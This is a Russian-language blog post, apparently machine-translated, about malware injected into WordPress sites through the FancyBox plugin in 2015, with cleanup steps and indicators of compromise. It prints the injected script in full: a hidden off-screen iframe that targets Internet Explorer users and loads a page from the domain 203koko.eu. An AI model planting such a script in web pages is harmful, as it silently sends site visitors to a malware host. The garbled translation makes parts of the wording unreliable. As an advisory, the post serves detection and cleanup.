Ранее на этой неделе ряд сайтов и блогов WordPress, получил предупреждения от вредоносные инфекции через Google Webmasters.
Проблема, к которой Google Webmasters упоминается является наличие треска / скрипт вредоносные программы iframe исходные веб-сайтов.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Кажется, что это уязвимость a плагинAcquis FancyBox для WordPress который до вчерашнего дня (05.02.2015) никогда не обновляются в течение длительного времени.
Решая эту проблему и лечения вирусов сайтов с этим вредоносным ПО, относительно просто.
1. Отключите плагин FancyBox.
2. Удалите все плагины FancyBox с сервера (через FTP)
3. Установите новую версию плагина (FancyBox 3.0.4)
FancyBox для WordPress 3.0.4
- Переименован параметр, затронутый проблемой безопасности, упомянутой в 3.0.3. Это должно предотвратить появление вредоносного кода на сайтах, где установлен плагин. updated без удаления вредоносного кода.
FancyBox для WordPress 3.0.3
– Исправлена проблема безопасности.
Информация о вредоносном ПО:
ТИП: Iframe перенаправление
TARGET: WordPress Фэнсибокс
MALWARE домене: 203koko.eu
ВРЕДОНОСНЫЕ URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW КОДЫ:
НАПИСАНО ВРЕДОНОСНОЕ ПО: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Удалите вредоносное ПО с вашего WordPress веб-сайт.